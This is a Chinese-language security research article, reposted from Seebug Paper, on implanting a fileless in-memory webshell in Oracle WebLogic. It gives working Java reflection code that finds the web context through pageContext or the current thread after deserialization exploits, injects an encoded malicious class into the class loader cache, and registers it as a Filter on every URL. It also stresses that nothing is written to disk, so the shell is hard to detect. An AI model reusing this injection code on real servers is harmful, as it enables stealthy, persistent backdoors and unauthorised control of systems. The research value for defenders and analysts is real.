weblogic 无文件 webshell 的技术研究

作者:宽字节安全

原文链接:https://mp.weixin.qq.com/s/euYuuI78oJhUHt9dVkomKA

本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!

投稿邮箱:paper@seebug.org

上篇文章中着重研究了tomcat的内存马以及实现方法。这篇文章主要研究了weblogic的内存马实现原理。在这里实现的原理与tomcat基本相同,同样使用动态注册Filter 的方式。下面分析一下weblogic在请求中是如何获取FilterChain。

以下分析基于 weblogic 12.2.1.4

0x01 weblogic FilterChain实现

创建一个Filter,随便打一个断点,观察此时的堆栈信息,如图

通过跟踪堆栈信息,我们可以找到,在wrapRun函数中,会判断系统中是否存在filter以及listener。如果存在,则获取FilterChain,然后依次调用Filter。原理与tomcat类似。相关代码如下

weblogic.servlet.internal.WebAppServletContext.ServletInvocationAction#wrapRun 函数

if (!invocationContext.hasFilters() && !invocationContext.hasRequestListeners()) {

this.stub.execute(this.req, this.rsp);

} else {

FilterChainImpl fc = invocationContext.getFilterChain(this.stub, this.req, this.rsp);

if (fc == null) {

this.stub.execute(this.req, this.rsp);

} else {

fc.doFilter(this.req, this.rsp);

}

}

而getFilterChain的代码在 weblogic.servlet.internal.FilterManager中。weblogic中主要使用FilterManager去管理系统中的Filter,包括动态注册一个Filter,获取FilterChain等。动态注册一个Filter的代码如下

    void registerFilter(String filterName, String filterClassName, String[] urlPatterns, String[] servletNames, Map initParams, String[] dispatchers) throws DeploymentException {

FilterWrapper fw = new FilterWrapper(filterName, filterClassName, initParams, this.context);

if (this.loadFilter(fw)) {

EnumSet<DispatcherType> types = FilterManager.FilterInfo.translateDispatcherType(dispatchers, this.context, filterName);

if (urlPatterns != null) {

this.addMappingForUrlPatterns(filterName, types, true, urlPatterns);

}

if (servletNames != null) {

this.addMappingForServletNames(filterName, types, true, servletNames);

}

this.filters.put(filterName, fw);

}

}

0x02 内存马实现

技术难点主要有以下几点:

  • 怎么寻找FilterManager
  • weblogic中类加载器机制

1. 寻找FilterManager

weblogic中,context会存放FilterManager。所以,这个问题转换为如何获取context。有两种方法

pageContext

jsp页面中的pageContext对象中,存有context对象。可以通过反射获取。这种比较适合直接上传jsp文件获取webshell权限的情况。代码如下

        Field contextF = pageContext.getClass().getDeclaredField("context");

contextF.setAccessible(true);

Object context = contextF.get(pageContext);

线程中

这种情况比较适合shiro,T3等反序列化漏洞,在无法上传文件,但是可以直接通过反序列化获取weblogic权限的情况。这种情况下不需要pageContext对象,在线程中查找context对象。代码如下

        Class<?> executeThread = Class.forName("weblogic.work.ExecuteThread");

Method m = executeThread.getDeclaredMethod("getCurrentWork");

Object currentWork = m.invoke(Thread.currentThread());

Field connectionHandlerF = currentWork.getClass().getDeclaredField("connectionHandler");

connectionHandlerF.setAccessible(true);

Object obj = connectionHandlerF.get(currentWork);

Field requestF = obj.getClass().getDeclaredField("request");

requestF.setAccessible(true);

obj = requestF.get(obj);

Field contextF = obj.getClass().getDeclaredField("context");

contextF.setAccessible(true);

Object context = contextF.get(obj);

2. FilterWrapper中类加载器机制

这里只针对于加载Filter的情况去讨论。在FilterManager的registerFilter方法中,主要通过FilterWrapper类去包装Filter类。但是FilterWrapper类的构造函数中,并没有可以传递Class的参数,只可以传递ClassName,FilterManager通过ClassName去查找Class。下面我们分析一下实现过程

在FilterManager的loadFilter中,Filter将会在这里实例化。代码如下

weblogic.servlet.internal.FilterManager#loadFilter

boolean loadFilter(FilterWrapper filterWrapper) {

String filterClassName = filterWrapper.getFilterClassName();

filter = (Filter)this.context.createInstance(filterClassName);

filterWrapper.setFilter((String)null, (Class)null, filter, false);

}

在filterWrapper.getFilterClassName中获取FilterClass的名称,然后通过context的createInstance方法去实例化。下面是createInstance的代码

Object createInstance(String className) throws ClassNotFoundException, InstantiationException, IllegalAccessException {

Class<?> clazz = this.classLoader.loadClass(className);

return this.createInstance(clazz);

}

在这里通过调用classloader的loadClass方法去根据名称查找Class。我们知道weblogic自定义了一个classloader,所以我们继续深入loadCLass方法,代码如下

weblogic.utils.classloaders.ChangeAwareClassLoader#loadClass(java.lang.String, boolean)

protected Class<?> loadClass(String name, boolean resolve) throws ClassNotFoundException {

synchronized(this.getClassLoadingLock(name)) {

Class res = (Class)this.cachedClasses.get(name);

if (res != null) {

return res;

} else if (!this.childFirst) {

return super.loadClass(name, resolve);

我们可以看出,ChangeAwareClassLoader会首先从cache中查找是否存在待查找的类,如果存在,则直接返回该名称对应的Class。

所以我们为了使自己待动态加载的Filter可以被FilterManager成功查找,最简单的方法是在这个缓存中动手脚。代码如下

    /*

第一步,将evilClass加载到classloader的cachedClasses中

*/

Field classLoaderF = context.getClass().getDeclaredField("classLoader");

classLoaderF.setAccessible(true);

ClassLoader cl = (ClassLoader) classLoaderF.get(context);

Field cachedClassesF = cl.getClass().getDeclaredField("cachedClasses");

cachedClassesF.setAccessible(true);

Object cachedClass = cachedClassesF.get(cl);

Method getM = cachedClass.getClass().getDeclaredMethod("get", Object.class);

if (getM.invoke(cachedClass, "bingxie") == null) {

// 判断一下,防止多次加载恶意filter, 默认只加载一次,不需要重复加载

BASE64Decoder b64Decoder = new sun.misc.BASE64Decoder();

String codeClass = "H4sIAAAAAAAAAKV..........";

Method defineClass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getDeclaredMethod("defineClass", byte[].class, int.class, int.class);

defineClass.setAccessible(true);

Class evilFilterClass = (Class) defineClass.invoke(cl, uncompress(b64Decoder.decodeBuffer(codeClass)), 0, uncompress(b64Decoder.decodeBuffer(codeClass)).length);

// 在这里 恶意类名称为 bingxie filter 名称为test

Method putM = cachedClass.getClass().getDeclaredMethod("put", Object.class, Object.class);

putM.invoke(cachedClass, "bingxie", evilFilterClass);

上面两个技术难点解决后,我们就可以向FilterManager中动态注册一个Filter。代码比较简单,如下

Method getFilterManagerM = context.getClass().getDeclaredMethod("getFilterManager");

Object filterManager = getFilterManagerM.invoke(context);

Method registerFilterM = filterManager.getClass().getDeclaredMethod("registerFilter", String.class, String.class, String[].class, String[].class, Map.class, String[].class);

// String filterName, String filterClassName, String[] urlPatterns, String[] servletNames, Map initParams, String[] dispatchers

registerFilterM.setAccessible(true);

registerFilterM.invoke(filterManager, "test", "bingxie", new String[]{"/*"}, null, null, null);

0x03 成果检验

检查weblogic,无文件落地。重启weblogic后,webshell消失

以上是 weblogic 无文件 webshell 的技术研究 的全部内容, 来源链接: utcz.com/p/199635.html

回到顶部